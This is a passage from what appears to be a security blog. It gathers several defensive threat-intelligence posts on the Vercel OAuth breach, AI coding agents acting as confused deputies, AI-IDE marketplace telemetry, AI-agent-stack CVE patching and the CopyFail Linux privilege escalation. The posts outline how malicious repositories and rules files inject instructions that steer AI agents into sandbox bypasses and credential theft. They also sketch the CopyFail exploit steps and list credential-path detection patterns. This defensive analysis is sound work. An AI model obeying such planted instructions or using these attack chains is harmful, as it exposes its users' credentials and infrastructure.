connected to their identity provider, not through any direct vulnerability in its own infrastructure. ###### What we know - April 19, 2026 — Vercel discloses the incident. Initial bulletin states attackers accessed certain internal systems; services remain operational; a limited subset of customers is impacted. - April 20, 2026, 02:01 UTC — Vercel publishes the root cause. Three-hop chain: Context.ai compromise → Vercel employee's Google Workspace account → certain Vercel environments and environment variables stored as non-sensitive. - Confirmed IOC — Google Workspace OAuth client ID 110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com, corresponding to the third-party AI app in the attack path. - Scope of access — Vercel reports values stored as sensitive environment variables remained unreadable. Values stored as non-sensitive environment variables should be treated as exposed. > The non-sensitive distinction is the lesson. Vercel's environment-variable model has two tiers; the lower tier is not encrypted-at-rest in a way that survives the kind of access an OAuth-app compromise grants. Anyone running secrets through non-sensitive Vercel env vars discovered they were trusting a different threat model than they thought. ###### Targeting Direct targeting was Vercel itself; second-order targeting includes any Vercel customer whose secrets sat in a non-sensitive environment variable on a project the compromised internal accounts could reach. - Vercel internal infrastructure — the direct target. Internal accounts, certain environments, environment-variable inventories. - The Vercel customers Vercel contacted — limited subset, specific to the projects/environments the compromised accounts could reach. - Any organization using OAuth third-party AI tools widely — same vector applies. The Vercel chain is one realization of a general pattern. ###### TTPs and the OAuth-as-supply-chain pattern The chain in operational terms: - Hop 1 — Context.ai compromise. Public reporting does not detail the initial-access mechanism on Context.ai's side. The salient observation is that a third-party AI tool installed by individual employees became the source of foothold. - Hop 2 — Google Workspace OAuth grant abuse. Context.ai had been authorized as an OAuth third-party application against the employee's Google Workspace identity. With Context.ai compromised, the attacker leveraged the OAuth grant to access the employee's Google Workspace mailbox, drive, and adjacent services within the scope of the granted permissions. - Hop 3 — internal Vercel access via Google identity federation. Vercel uses Google Workspace as the identity backbone. Once the attacker had the employee's Google Workspace foothold, services that federate identity from Workspace were reachable. From there the attacker reached Vercel environments and environment variables the employee's identity could see. The trust assumption that breaks each hop is different. Hop 1 assumes Context.ai's security is comparable to Vercel's (it isn't necessarily — third-party AI tools are often early-stage companies with smaller security programs). Hop 2 assumes the OAuth grant is a permission boundary; it is, but only against external attackers, not against attackers who have compromised the OAuth client itself. Hop 3 assumes Workspace federation is a strong identity boundary; it is, until you remember that the Workspace account itself was reached from outside. ###### Indicators of compromise - Google Workspace OAuth client ID — 110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com. Filter Workspace audit logs for activity from this client ID during the affected window. - Context.ai authorization grants — review Security > Access and data control > API controls > Manage Third-Party App Access in Workspace admin for the listed client ID; revoke wherever found. - Vercel non-sensitive environment variables — inventory across every project. Secrets stored at this tier in the affected window should be treated as exposed. Datadog log queries (provided by Datadog Security Research): - Activity for the OAuth client ID: source:gsuite @actor.applicationInfo.oauthClientId:110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com - Authorization events for the client ID: source:gsuite @evt.name:authorize @event.parameters.client_id:110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com ###### Detection and mitigation - Revoke the OAuth grant. Find the Context.ai client ID in your Workspace admin third-party app inventory and revoke. Have individual users review their personal Google account third-party access for the same client ID. - Rotate everything in non-sensitive Vercel environment variables. API keys, access tokens, database credentials, signing material. Re-create as sensitive environment variables wherever the Vercel project supports the distinction. - Audit Workspace OAuth grants holistically. The Vercel incident is one realization of a class. Inventory all third-party AI tools authorized as OAuth apps; review the scopes each holds; revoke ones that aren't load-bearing or whose vendor security posture you can't validate. - Treat Workspace as a privileged identity boundary. If your engineering platform federates from Workspace, every Workspace account compromise is also a platform compromise. Phishing-resistant MFA on Workspace, conditional access policies, and short-lived federated sessions all reduce the blast radius of hop 3. - Detect OAuth-key-driven privileged actions. Datadog Cloud SIEM ships rules covering OAuth keys performing account creation or security changes, and unfamiliar service accounts modifying group memberships. These are the post-OAuth-compromise patterns to watch for. - Detect session-cookie hijacking. Google's own session-termination signals (suspicious cookie detection) are a useful tripwire — Cloud SIEM's Google Workspace user account signed out due to suspicious session cookie rule surfaces them. ###### What the OAuth-as-supply-chain pattern means Three observations stand out from the Vercel chain: - Third-party AI tools are an under-modeled supply chain. Employees connect them to Workspace identities at individual discretion. The grant lifetime is long, the scope is often broader than the use case requires, and the vendor's security posture is often early-stage. Context.ai-class compromise is going to recur; the question is whether your organization's OAuth grant inventory tracks who's authorized what. - "Sensitive" vs "non-sensitive" environment variables are a real boundary that defenders need to use. Vercel's distinction between the two tiers wasn't marketing — sensitive values were unreadable to the attacker; non-sensitive values were exposed. Other platforms have similar distinctions (Kubernetes Secret encryption-at-rest, AWS Parameter Store SecureString, GCP Secret Manager). Use the protected tier wherever it exists. - Identity-federation-as-supply-chain is the next chapter. When Workspace is your platform identity, Workspace OAuth surface is your platform's perimeter. The same employees who would never grant a random vendor admin access to your AWS account routinely grant Workspace-OAuth-third-party-app access without much review. The grants are the perimeter now. The closest conceptual peer in the recent record is the AI-agent-as-confused-deputy pattern — a privileged process operating on attacker-influenced input. Here the deputy is the Context.ai OAuth app, the input is whatever the attacker fed into Context.ai, and the privileges are Workspace-grant scope. Same pattern, different deputy. Capability narrowing — short-lived OAuth grants, scope-minimized rather than scope-maximized — is the structural defense, the same way it is for AI-agent runtimes. For comparison with a different supply-chain shape running concurrently, see the analysis of Team PCP's six-week chain through security tooling vendors. Team PCP attacks the package-publish boundary. The Vercel chain attacks the OAuth-grant boundary. Both end with attacker-controlled code (or attacker-controlled identity) reaching credentials it shouldn't. Different vectors, same outcome class. One final framing note. The Vercel chain has no observable presence in criminal markets — no Context.ai-credential brokering, no Workspace-OAuth-grant trade, no commodity packaging of the technique. That's the expected shape: identity-federation attacks like this one are operator-specific, executed by the same attacker who compromised hop 1, and don't commoditize into kits other operators can buy. The detection signal lives in your Workspace audit logs and your Vercel project inventory — not on .onion forums. Same lesson as the AI-IDE marketplace surface: monitor the legitimate channel where the threat actually lives. --- # The AI agent as confused deputy: a 2026 attack class URL: https://keepsecure.io/hub/ai-agent-confused-deputy-pattern Published: 2026-04-29 Tags: AI agents, confused deputy, threat modeling, capability security, isolation, security architecture Four recent CVEs reveal the AI agent as confused deputy: privileged process, attacker-controlled input. The class named, mapped, and defended. A confused deputy is a program that holds privileges, accepts requests from a less-privileged caller, and gets tricked into using its privileges on the caller's behalf. The original example dates from 1988. In 2026, the deputy is the AI coding agent — and a recent cluster of CVEs makes the class concrete. ###### The pattern The unprivileged caller is the input the agent operates on: a GitHub repository, a user prompt, a downloaded model file, a package.json. The privileges the deputy holds are the things that make the agent useful in the first place — cloud credentials, the ability to run shell commands, the ability to publish packages, the ability to load and execute model weights. The same property that makes agents productive makes them a confused-deputy magnet. > The agent is not malicious. The agent is doing its job. It got handed an input, and the input told it to do something the agent's privileges allowed. ###### CVE-2026-34040 — Docker authorization plugin bypass - Deputy — the AI coding agent's Docker daemon. - Attacker-influenced input — a malicious GitHub repository the agent has cloned and is operating on. - Privileges held — Docker API access, cloud credentials mounted at container start, kubeconfig. - Confusion mechanism — the malicious repository contains instructions, in README, devcontainer config, or postinstall hook, that cause the agent itself to execute a crafted Docker API call that bypasses the authorization plugin. The pattern in its purest form. The agent is doing what it was asked to do; the request was attacker-controlled. ###### CVE-2026-7733 — LangChain PythonREPLTool escape - Deputy — the LangChain PythonREPLTool. - Attacker-influenced input — a prompt that reaches the REPL through the agent's normal control flow. - Privileges held — Python execution in the agent's process. - Confusion mechanism — a missing check on __import__ lets a prompt-controlled call break out of the documented sandbox. The REPL was designed under the assumption that prompts are bounded data. They aren't. They are code-equivalent input that should not have been treated as data in the first place — true of every prompt-driven tool, not just this one. The CVE is the specific bug; the class is "tools designed under the wrong threat model." ###### CVE-2026-12091 — npm postinstall maintainer takeover - Deputy — npm install. - Attacker-influenced input — a corrupted version of a legitimate package, signed by the legitimate maintainer because the maintainer's account was taken over. - Privileges held — code execution at install time, often as the developer user with full env-var, SSH-key, and git-credential access. - Confusion mechanism — there isn't one. postinstall does what postinstall always did. The change is who controls the script. The cleanest mapping. The deputy doesn't have a bug. The pattern is the bug — running attacker-controlled code with developer privileges at every install. Patching npm doesn't help; the fix has to be structural. ###### CVE-2026-5760 — SGLang malicious GGUF - Deputy — the GGUF model loader. - Attacker-influenced input — a downloaded weight file. - Privileges held — code execution in the inference server's process. - Confusion mechanism — parser flaw lets a malicious model file achieve RCE via the loader. The trust boundary used to be "downloaded binary." Anyone running an inference server understood that running attacker-supplied binaries was dangerous. The new boundary is "downloaded weights" — and that boundary moved without anyone announcing it. Most operators still treat GGUF files as data, not code-equivalent. ###### Why 2026 specifically The confused-deputy pattern is forty years old. What changed is two things, both about privilege. First, privilege-bearing agents are now common. Two years ago, an AI agent was a chatbot in a sandbox with no real authority. Today, agents routinely hold long-lived cloud credentials, GitHub publish tokens, npm publish tokens, kubeconfigs, and the ability to write to file paths that matter. Agents are useful because of those privileges. They are dangerous because of them too. Second, agent input surfaces are inherently untrusted. Agents are designed to work on user-supplied inputs — GitHub repositories from anywhere, prompts from anywhere, model weights downloaded from anywhere. The agent's job is to accept those inputs and act on them. That makes every untrusted-input boundary in the stack a confused-deputy candidate by default. Combine the two and the picture is clear. An entire generation of infrastructure has been built on the assumption that "running in a Docker sandbox" was sufficient isolation, paired with input surfaces that include arbitrary attacker-controlled code and prompts. The four CVEs are not unusual events. They are the predictable consequence. ###### Privilege narrowing is the structural fix The single biggest mistake in agent security architecture is treating "isolation" as a binary property of the runtime. It isn't. It's a property of the credential and capability surface the agent reaches into. Long-lived admin credentials mounted into agent sandboxes are an anti-pattern; the mounted credentials become the privilege surface that a successful confused-deputy attack reaches. - Short-lived, scope-narrowed tokens issued per-task. Generate the token when the user dispatches the task; revoke it when the task completes. - Tokens that can do only what the task needs. Per-task IAM roles in cloud, per-task GitHub fine-grained PATs, per-task npm publish tokens scoped to a single package. - Read-only by default. Make write privileges an explicit, narrow exception. ###### Isolation that survives agent subversion Shared Docker on a host with cloud credentials is not a security boundary for untrusted code. CVE-2026-34040 makes this explicit, but it was true before the bug was disclosed. - Per-task isolation domains — Firecracker microVMs, gVisor sandboxes, per-task Kubernetes pods with their own IAM principal. - Design the isolation domain as the unit of compromise. A fully compromised domain still cannot reach anything you care about. - Stepping-stone pattern for production — agent → tightly-scoped intermediary service → production. The intermediary enforces the policy the agent doesn't. ###### Treat all agent inputs as untrusted code-equivalent A repository from an internal user is not safer than one from an external user, in security terms. The internal user might have been phished. Their account might have been taken over. An attacker-controlled package.json looks identical regardless of who pushed it. - No per-source allowlisting based on "trusted internal." Every input flows through the same untrusted-input pipeline. - Static analysis on incoming repositories before agent invocation — package.json install hooks, dev-container configs, GitHub Actions workflows, .cursorrules / .windsurfrules, and any file the agent will read as instructions. - Prompt input is code-equivalent. If a prompt can reach a tool that executes code, the prompt is an RCE surface. ###### Detect confused-deputy attempts even when patched The patch fixes the specific bug. The pattern continues. Detection has to be runtime, not advisory-driven. - Log every privileged operation the agent performs and check it against the user-issued task. Cloud-API calls outside the task scope are evidence of confused deputy. - Watch for credential-path reads — ~/.ssh, ~/.aws, ~/.npmrc, kubeconfig paths — by agent processes. Almost never legitimate. - Egress monitoring on agent isolation domains. Outbound traffic to anything other than the package registry, model registry, and explicitly-allowed APIs is suspicious. ###### What this means going forward The confused-deputy class is going to grow. Every new tool that agents can invoke is a candidate. Every new credential type that gets mounted into agent runtimes is a candidate. The question for security teams is not whether their agents will be used as deputies — they will. The question is whether the privilege surface the deputy can reach is narrow enough that a successful confusion is recoverable. Capability-based design is forty years old too. It came back into fashion at the right time. --- # Where AI-IDE threats actually live: telemetry beyond the dark web URL: https://keepsecure.io/hub/ai-ide-marketplace-security-telemetry Published: 2026-04-29 Tags: AI IDE, Cursor, VS Code, OpenVSX, supply chain, detection engineering Dark-web sweeps come up empty for AI-IDE threats — but the threat exists. It's on the legitimate marketplace. Where to look and what to alert on. Defenders trying to monitor the AI-IDE threat surface — Cursor, Windsurf, the VS Code agent ecosystem, OpenVSX-distributed extensions — point dark-web sweeps at it and get clean negatives. The mistake is concluding the threat doesn't exist. It does. It just isn't on .onion. The threat is going through the legitimate marketplace, the legitimate registry, the legitimate dependency tree, and the legitimate repository. That's where the telemetry needs to be. ###### The wrong instrument Pointing dark-web monitoring at the AI-IDE threat surface is a reasonable first instinct on a new threat class. Existing pipelines, existing sources, established alerting. The result is a clean negative: no broker pricing, no commodity exploit-kit packaging, no measurable trade volume in the criminal market. Empty. The public record from the last fourteen months tells a different story. GlassWorm propagated malicious extensions through OpenVSX via a compromised maintainer account. SleepyDuck shipped a RAT in a VSX extension that uses Ethereum smart contracts as a sinkhole-resistant C2. A "vibe-coded" VS Code extension shipped through the legitimate marketplace with built-in ransomware. A critical OpenVSX registry flaw exposed millions of developers. An OpenVSX pre-publish bypass let malicious extensions reach the store. An audit of 100+ VS Code extensions exposed developers to hidden supply-chain risk. The Rules File Backdoor poisoned .cursorrules and .windsurfrules. Malicious npm packages with Cursor-specific install hooks backdoored 3,200 users. Cursor IDE itself accumulated nineteen CVEs in eight months. > The dark web is empty because the threat isn't going through the dark web. It's going through the legitimate channels. That's where the telemetry needs to be. ###### Where AI-IDE threats actually live Four telemetry surfaces, in roughly decreasing order of how much you'd catch by watching them: extension marketplaces, repository-level signals, build-time signals, and AI-agent runtime sandboxes. ###### 1. Extension marketplaces (VS Code Marketplace, OpenVSX) This is the first place a malicious extension touches your users. The attack pattern is consistent across GlassWorm, SleepyDuck, and the vibe-coded ransomware extension: an attacker either compromises an existing publisher account or registers a new one with a plausible-looking name, publishes an extension that performs whatever its description says it does plus the malicious payload, and waits for installs. - New versions from dormant publishers — publishers who haven't published in 90+ days suddenly shipping an update is a high-base-rate suspicion signal. The compromised-maintainer pattern fingerprints here. - Unusual capability sets — full filesystem access, network egress to non-marketplace domains, child-process spawn rights. Capability requests are declared in package.json; you can audit them before installation. - JavaScript that resolves URLs from on-chain sources — Ethereum smart contracts, IPFS, blockchain RPC endpoints. SleepyDuck used this; the pattern is fingerprintable in the extension's bundled JS. - Postinstall and activation hooks that touch credential paths — ~/.ssh, ~/.aws, ~/.npmrc, ~/.config/gh, OS keychain APIs, browser cookie databases. Almost never legitimate for an IDE extension. - Network egress in the extension's first 60 seconds of activation, to destinations that aren't the extension's declared backend. Out-of-distribution egress is the cleanest single signal you can collect. Collection: subscribe to marketplace publish feeds (both VS Code Marketplace and OpenVSX expose them). Run static analysis on the bundled JS and package.json of every new publish. Run dynamic capability tracing in a throwaway sandbox on a sampled fraction. The signal-to-noise on capability tracing is high enough that you can alert on the unusual cases directly. ###### 2. Repository-level signals The Rules File Backdoor demonstrated that the malicious payload can sit in the repository the agent is instructed to operate on. .cursorrules, .windsurfrules, .github/copilot-instructions.md, devcontainer.json, .vscode/tasks.json, .devcontainer/Dockerfile — all of these are files the agent reads as instructions, and any of them can be modified to redirect the agent's behavior. - Modifications to rules files by non-human committers. Bots and automated scripts modifying .cursorrules / .windsurfrules / instructions markdown is almost always wrong. - New files in .github/workflows/ with permissions that exceed apparent purpose — id-token: write, contents: write, packages: write on a workflow that says it's just running tests. - VS Code task and launch config additions — modifications to .vscode/tasks.json and .vscode/launch.json that introduce new shell-out commands. These run in the developer's shell context with the developer's credentials when the IDE opens the workspace. - Devcontainer postCreateCommand and postStartCommand additions. Same risk profile as npm postinstall, but at container start instead of package install. Collection: treat these files like .github/workflows/*.yml — security-sensitive configuration that requires explicit review. CI hook on PR open that diffs the rules-file content and requires a human-approved label before merge. Most orgs already have this pattern for workflow files; extend it. ###### 3. Build-time signals Every npm install is a code-execution event. The recent npm registry compromise (CVE-2026-12091) made this concrete with a 38-million-weekly-downloads compromise, but the pattern was true before the CVE was disclosed and will be true after the patch ships. - Postinstall and preinstall scripts that touch credential paths or perform network egress. Most packages have neither; the ones that do are the high-value audit set. - Lockfile diffs pulling in versions from compromised windows. One-time scan against the published list of bad versions, but worth doing across every active repository. - Postinstall scripts running outside the build's nominal host. If your CI runs npm install in container A and the postinstall script tries to reach the cloud metadata service from container A, that's evidence of attempted credential theft. - New postinstall script content in dependency updates. Mass changes to a previously-stable script are suspicious. Collection: instrument your CI runner to log all postinstall and preinstall commands and outbound network attempts during install. Most CI vendors expose audit logs sufficient for this. For local developer machines, the most defensible answer is "developers should run npm install inside a sandboxed container with no credential mounts," which most orgs are not yet doing but should be. ###### 4. AI-agent runtime sandboxes Once an agent is running on your infrastructure, the question is what it can reach. This is the runtime equivalent of the marketplace question — you've passed the perimeter, now watch what happens inside. - Cloud-API calls from agent sandboxes that don't match a user-dispatched task. An agent asked to refactor a TypeScript file should not be calling iam:GetUser or reading the cloud metadata service. - kubeconfig reads, Docker socket access, and credential-path reads from agent processes. These are confused-deputy fingerprints. - Outbound network connections to destinations outside the agent's allowed set — package registries, model registries, the LLM API endpoint. Anything else is suspicious by default. - Privilege-escalation patterns inside the sandbox — setuid binary execution, kernel module probes, container-escape primitives. Collection: runtime security tooling on the host or per-pod (eBPF-based runtime sensors are the standard answer). Signal volume is moderate; the false-positive rate is manageable if you scope alerting tightly to the credential-path-read and out-of-task-cloud-API patterns specifically. ###### Detection-engineering rollout order The work split among the four sources is roughly: marketplace ingestion is highest-leverage (one pipeline catches every malicious extension before it reaches a single user). Repository signals are medium-leverage and easy wins (most controls extend existing PR-review hygiene). Build-time signals are medium-leverage and require CI integration. Runtime sandbox monitoring is high-leverage but expensive — required if you run agents in production with real privileges, less critical if your agents are toy assistants. A reasonable rollout order for an org starting from zero is marketplace ingestion first, repository hooks second, CI install instrumentation third, runtime sandbox monitoring fourth. The first two have low setup cost and high coverage; the last two require infrastructure investment that should be informed by what the first two are catching. ###### What to retire Pointing dark-web monitoring at the AI-IDE threat surface is not wrong, but it's not where the signal is. Keep the dark-web pipeline running for what it's good at — credential leakage, infostealer harvests, ransomware leak sites, broker price sheets for commoditized exploit kits. Add the four telemetry sources above for AI-IDE specifically. Don't expect the dark-web pipeline to fire on this bug class; the criminal market hasn't picked it up because the criminal market doesn't need to. The attacker can publish to OpenVSX directly. The right detection-engineering posture for AI-IDE in 2026 is to assume the threat is going through legitimate channels, build telemetry for those channels, and treat the dark-web absence as confirmation that you're looking in the right places — not as evidence that there's nothing to look for. For the contrasting case — what dark-web crossing actually looks like when the bug class supports commoditization — see the CopyFail time-to-criminalization analysis. A Linux page-cache LPE with the right reliability properties showed up on a carding forum's Exploits section seven days after disclosure. Same pipeline, opposite shape. The two outcomes together describe what the dark-web sensor is measuring and what it isn't. --- # Four AI-coding-agent-stack CVEs you should patch first URL: https://keepsecure.io/hub/ai-coding-agent-cves-patch-priority Published: 2026-04-29 Tags: AI agents, AI supply chain, Docker, npm, LangChain, RCE, patching A short cluster of CVEs has hit the runtime stack AI coding agents rely on — npm install, Docker, LangChain, model loaders. Patch order and structural fixes. Four CVEs landed in a single short window, all targeting the runtime stack AI coding agents depend on: npm install, the LangChain Python tool, Docker sandboxes with cloud credentials, and the GGUF model loader. None of these chains are commodity criminal infrastructure yet. The patching window is open. Patch on a normal change-management cadence; don't get caught two months from now when the npm chain inevitably gets repackaged into a stealer family. ###### Why these four are a single story Each CVE on its own is normal patch-Tuesday work. Together they cover every layer of how an AI coding agent does its job: dependency install, tool execution, model loading, and the container runtime that wraps everything else. If you run AI coding agents in production, you have at least two of these layers active simultaneously. The chain risk is real — a malicious GitHub repository (which the agent will helpfully clone) can plant package.json postinstall hooks, prompt-injection payloads, and crafted dev-container configs in the same payload. One repo, four levers. - CVE-2026-12091 — npm registry compromise. Five widely-installed packages, 38M weekly downloads, postinstall hooks exfiltrating env vars and SSH keys. CVSS 8.8. - CVE-2026-34040 — Docker auth-plugin bypass. The published exploitation path turns a Cursor-class AI coding agent into a cloud-takeover tool. CVSS 8.8. - CVE-2026-7733 — LangChain PythonREPLTool sandbox escape via __import__. Any LangChain agent exposed to user input is now an RCE. CVSS 9.6. - CVE-2026-5760 — SGLang RCE via malicious GGUF model file. Trust boundary moves from "downloaded binary" to "downloaded weights." CVSS 9.8. > The agent threat model that was theoretical two years ago is now operational. Each CVE is normal infrastructure work; the cluster is the news. ###### 1. CVE-2026-12091 — npm postinstall (CVSS 8.8) The most boring of the four, and that's exactly why it's first. Five compromised packages, 38M weekly downloads combined. Every developer running npm install against a corrupted lockfile gets credential exfiltration. Zero attacker effort post-publish. The maintainer 2FA bypass is now patched, but the bad versions remain in the registry's history and in lockfiles people haven't refreshed. - Refresh package-lock.json against current versions across every repository that touches the affected packages. - Audit postinstall and preinstall scripts for any path under ~/.ssh, ~/.aws, ~/.npmrc, or any token store. Most packages have neither hook; the ones that do are the high-value audit set. - Pin transitively for AI-agent workspaces — never let an agent run npm install against unpinned dependencies. Run agents against a pre-built workspace where possible. - Rebuild base images if you ship containers. Old base images with the bad versions are still poisoned. ###### 2. CVE-2026-34040 — Docker auth bypass and AI-agent confused deputy (CVSS 8.8) The most novel. The underlying bug is an incomplete fix for CVE-2024-41110 — Docker authorization plugins make their allow/deny decision on incomplete request data. The published exploitation path is what makes this 2026-specific: a malicious GitHub repository tricks an AI coding agent in a Docker-based sandbox into executing the bypass, then pivots from the container into the cloud account and Kubernetes clusters the agent can reach. - Upgrade Docker to the patched release immediately. The bypass works against any host using authorization plugins. - Remove cloud credentials from AI-agent sandboxes by default. Use short-lived, scope-narrowed tokens issued per-task, not long-lived admin credentials mounted at container start. This is the structural fix; the Docker patch is the tactical one. - Replace shared Docker for agents operating on untrusted repositories — Firecracker microVMs, gVisor, or per-task Kubernetes pods with their own IAM principal. Shared Docker is no longer a security boundary for untrusted code. - Audit recent agent activity for cloud-API calls, kubeconfig reads, or Docker socket access that don't match a legitimate user task. Any of these is evidence of a confused-deputy attempt, regardless of patch state. ###### 3. CVE-2026-7733 — LangChain PythonREPL escape (CVSS 9.6) A missing check in PythonREPLTool lets a prompt-controlled __import__ call break the documented sandbox. Any LangChain agent that exposes the Python REPL tool to user input is an RCE; the sandbox boundary doesn't hold. - Upgrade LangChain to a version newer than 0.2.26. Versions 0.1.x through 0.2.26 are affected. - Audit your agents for PythonREPLTool usage. If it's there and the agent takes user input from any source, the agent is RCE-capable until patched. - Treat the REPL tool as an unconditionally-untrusted code-execution endpoint regardless of patch state. Run it in a separate isolation domain — microVM or container with no network egress and no credential mounts — not in-process. ###### 4. CVE-2026-5760 — SGLang malicious GGUF (CVSS 9.8) A crafted GGUF model file causes RCE on the inference server. CVSS is the highest of the four, but the deployment surface is narrowest — only orgs running SGLang inference servers, and only when they ingest models from untrusted sources. - Upgrade SGLang to the patched release. - Treat downloaded weights as untrusted binary input. Sandbox the model loader. Don't run inference servers as root or with credential mounts. - Isolate per-request if you accept user-uploaded models. Run the loader behind a strict input filter and consider a microVM boundary per request. ###### What "patching window is open" actually means These four chains are not yet showing up in commodity criminal infrastructure — no exploit-kit packaging, no broker-pricing line items, no observable trade volume in the ordinary criminal-market data. That's the normal pattern for research-grade chains: weeks-to-months of pre-commoditization, and some never make it because they require too much per-victim setup. CVE-2026-7733 and CVE-2026-5760 may stay research-grade indefinitely; CVE-2026-12091 is the most likely to be repackaged into commodity stealer infrastructure because the work is already done — the postinstall script is the implant. The window is meaningful because it lets you patch on a normal change-management cadence rather than an emergency one. Patch this week. Get isolation in place this month. Don't get caught two months from now when the npm chain shows up downstream in an info-stealer family that has done nothing other than swap the implant. ###### What this isn't This isn't an "AI is dangerous" essay. It is the observation that the AI-agent stack now has its first round of CVEs that target the way agents actually work — running attacker-controlled code, processing attacker-controlled inputs, holding privileged credentials. Each individual CVE is normal infrastructure work; the cluster is the news. Patch accordingly. --- # CopyFail crossed onto a carding forum in seven days. Here's why that matters. URL: https://keepsecure.io/hub/copyfail-time-to-criminalization-seven-days Published: 2026-04-29 Tags: threat intelligence, Linux LPE, dark web, criminal markets, CVE-2026-31431, patch prioritization CVE-2026-31431 was disclosed on April 22. By April 30 it was an active thread on a carding forum's Exploits section. The seven-day crossing tells you which Linux LPE class the criminal market actually buys. CVE-2026-31431 — codenamed Copy Fail — was disclosed on April 22, 2026. Eight days later, on April 30, it was an active thread on the Exploits section of a long-running carding forum, posted by an established forum member alongside cracked Cobalt Strike binaries and similar commodity offensive tooling. Seven-to-eight days from researcher disclosure to criminal-forum chatter is fast — and the speed itself is the defensible insight. The criminal market made its judgment about CopyFail before most enterprise patch cycles will have started. It picked correctly. Defenders should take that judgment seriously and prioritize accordingly. ###### What we observed - April 22, 2026 — CVE-2026-31431 disclosed by Xint.io and Theori. CVSS 7.8, Linux kernel local privilege escalation via the algif_aead in-place AEAD optimization. 732-byte Python exploit, four-byte page-cache write, cross-container. Affects every Linux distribution shipped since August 2017. - April 30, 2026 — A thread titled [0-Day] CVE-2026-31431 – CopyFail: Linux Local Privilege Escalation appears on the Exploits section of an established carding forum. Posted by a forum member with prior activity on the same site (social-engineering threads, other tooling discussion). The thread sits in the same section as cracked Cobalt Strike and similar commodity criminal tooling, not in a research-mirror or news-aggregator section. > The forum's organization is the signal. The thread is in "Exploits" alongside commodity criminal tooling, not in "News" alongside research summaries. That's an opinion the forum is expressing about how the bug will be used. ###### Why CopyFail crossed and Cursor didn't Earlier this month a comprehensive dark-web sweep across the AI-IDE threat surface — nineteen Cursor IDE CVEs disclosed over eight months, multiple GlassWorm-class extension supply-chain compromises, the OpenVSX registry flaws — returned a clean negative. No criminal-market interest, no broker pricing, no observable trade volume. Same pipeline, same engines, same baseline databases. CopyFail is the same age as the latest Cursor CVEs — disclosed in the same month — and it crossed in a week. The difference isn't pipeline coverage. It's bug economics: - Reusable primitive vs research-grade chain. CopyFail is a four-byte arbitrary write into the page cache that works deterministically across every modern Linux distribution. It composes with literally any other foothold — webshell, container compromise, low-privilege CI runner, malicious dependency that achieved code execution. The Cursor bugs require the victim to be running Cursor, against a specific repository, in a specific configuration. One is a building block; the other is a niche. - Cross-container blast radius. The page cache is shared across containers on the same host. Criminal tooling targets Kubernetes nodes, shared CI runners, container-as-a-service platforms — exactly the multi-tenant environments where this primitive is most valuable. Cursor is a developer endpoint. The criminal market doesn't run a developer endpoint targeting business. - Ransomware operator demand. Linux LPE is a recurring shopping list item for ransomware operators who need to escalate from initial-access foothold to host-level encryption authority. CopyFail fits the role exactly. Cursor exploits don't fit any operator's workflow that exists today. - Reliability properties. The published exploit needs no kernel offset leak and no race condition. That makes it weaponizable by operators who don't have the engineering depth to handle exploits with environment-dependent reliability. Lowering the operator skill floor is what drives commoditization. ###### Time-to-criminalization as a patch-prioritization signal Most security teams patch by CVSS, sometimes by CISA KEV, occasionally by a hunch about exploit prevalence. None of those reflect what the criminal market is actually doing. CVSS 7.8 vs CVSS 9.8 doesn't tell you whether a bug will be in a stealer family in three months. KEV tells you the bug is already exploited in the wild — useful, but late. Time-to-criminalization is an earlier signal: it shows you which research disclosures the criminal market is choosing to invest in, before the in-the-wild exploitation builds enough volume to land on KEV. The framework is simple: - Crossed within days — criminal market sees commodity value. Patch on emergency cadence regardless of CVSS. Expect downstream incorporation into stealer / loader / ransomware tooling within weeks. - Crossed within months — niche or specialized value. Patch on normal cadence. Expect incorporation into specific operator workflows (initial access brokers, specific ransomware affiliates). - Hasn't crossed in a quarter — research-grade. Likely never commoditizes. Patch on routine cadence; deprioritize against bugs that have crossed. CopyFail is in the first bucket. Patch this week. The recent npm registry compromise (CVE-2026-12091) is also in the first bucket because the implant work is already done — the postinstall script is the payload. The Cursor cluster is in the third bucket and arguably never reaches the second. The patching urgency is opposite to the order CVSS would give you. ###### What the carding forum tells you about the operator playbook The forum's section structure tells you who's reading the thread and what they intend to do with the exploit. CopyFail showed up in "Exploits" alongside cracked Cobalt Strike, social-engineering walkthroughs, and commodity infostealer source code. That's the operator demographic — not nation-state, not research-grade APT, not bug-bounty hunters. Mid-tier criminal operators looking for a portable, reliable Linux LPE to bolt onto whatever initial-access mechanism they already have. The expected progression from this point, based on prior Linux LPE patterns: - Weeks 1–2 — exploit code circulates in private/paid threads. Expect a Metasploit module, a clean public PoC, or both within ten days. - Weeks 2–6 — incorporation into established malware loaders. The four-step exploit (open AF_ALG socket, build payload, splice into target page cache, execve setuid) is short enough to drop into a Go or Rust loader without major engineering work. - Months 1–3 — appearance in observed ransomware deployments where Linux is in the kill chain (VMware ESXi adjacent infrastructure, Linux file servers, Kubernetes nodes during lateral movement). - Months 3–6 — possible KEV listing as in-the-wild exploitation accumulates enough vendor incident-response cases to reach the threshold. This is the standard Linux page-cache LPE arc. Dirty Pipe (CVE-2022-0847) followed it. Copy Fail is structured to follow it faster because the primitive is more reliable. ###### What defenders should do this week - Patch the kernel everywhere — Amazon Linux, Debian, RHEL, SUSE, Ubuntu have advisories out as of disclosure date. Reboot or live-patch as appropriate. - Audit the AF_ALG attack surface. Most application workloads do not use the kernel cryptographic socket interface. A seccomp filter denying socket(AF_ALG, ...) closes the exploit path for that workload regardless of patch state. This is the right defense-in-depth layer for any container runtime that doesn't strictly require AF_ALG, and it survives the next page-cache LPE in the same class. - Inventory setuid binaries. Reduce the count where you can. Fewer setuid targets means fewer easy exploitation endpoints for any future page-cache write primitive — and there will be more in this class. Page-cache writes have become a recurring Linux LPE shape; treat the primitive as a category rather than a specific bug. - Treat your multi-tenant Linux hosts as the priority surface. Kubernetes nodes with mixed-trust workloads, shared CI runners, container-as-a-service platforms, bastion hosts. The cross-container property of this primitive turns an in-container compromise into a host compromise; that's the business case the carding-forum readers are evaluating. ###### The takeaway You can spend a lot of time speculating about which CVEs will and won't matter. The criminal market does the same exercise with money on the line, and it publishes its conclusions, in plain text, on forums you can read. CopyFail crossed in a week. That's the answer to "is this one of the serious ones." When time-to-criminalization is days, it doesn't matter what your normal patch cadence is — you have already lost the timing argument with the people building tooling against the bug. Patch. --- # CVE-2026-31431: Copy Fail — four bytes into the Linux page cache 